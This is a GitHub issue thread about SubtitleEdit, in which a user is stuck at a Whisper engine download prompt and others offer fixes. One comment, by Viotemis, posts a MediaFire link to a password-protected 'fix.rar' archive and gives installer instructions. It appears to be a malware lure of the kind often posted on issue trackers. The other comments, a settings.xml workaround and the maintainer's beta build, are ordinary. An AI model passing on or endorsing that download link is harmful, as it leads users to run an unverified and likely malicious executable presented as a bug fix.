### ISSUE TITLE
Whisper Engine Switch Issue

### ISSUE THREAD

**Issue by LeonCheung** [SubtitleEdit/subtitleedit#8769]
Today I accidentally switched the whisper engine to another one that I never used before, and then I closed the window. However, when I enter the menu next time, it shows this:

![image](https://github.com/user-attachments/assets/bb0ba782-bea9-4b88-aadc-8163c6e2f3c2)

I just found that's no way to bypass this, because I don't want to download it (and it does fail when I'm trying to download it for some connection issue), so I clicked No or Cancel, but nothing happened, which means I cannot open the menu and use other engine(s) either.

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by LeonCheung** [comment]
@Viotemis Thanks, buddy! The fact is that I cannot bypass this window. (well, just found a way to bypass it but a bit tricky) And, from my previous experience, I cannot use it because of my processor model.

**Comment by darnn** [comment]
I believe the thing that determines this in settings.xml is `<WhisperChoice>Const-me</WhisperChoice>` (that's what it's set to for me).
You can try changing it from whisper.cpp to something else, though I don't know how to easily find the list of possible values. I'd just change it to `Const-me` since that should only be a small download. In case that fails, I'm attaching the contents of my `SubtitleEdit/Whisper/Cpp` folder, which, if extracted there, should allow you to open the Whisper dialog without that prompt.
[Cpp.zip](https://github.com/user-attachments/files/16765817/Cpp.zip)

**Comment by niksedk** [comment]
thx - should be fixed now: https://github.com/SubtitleEdit/subtitleedit/releases/download/4.0.7/SubtitleEditBeta.zip
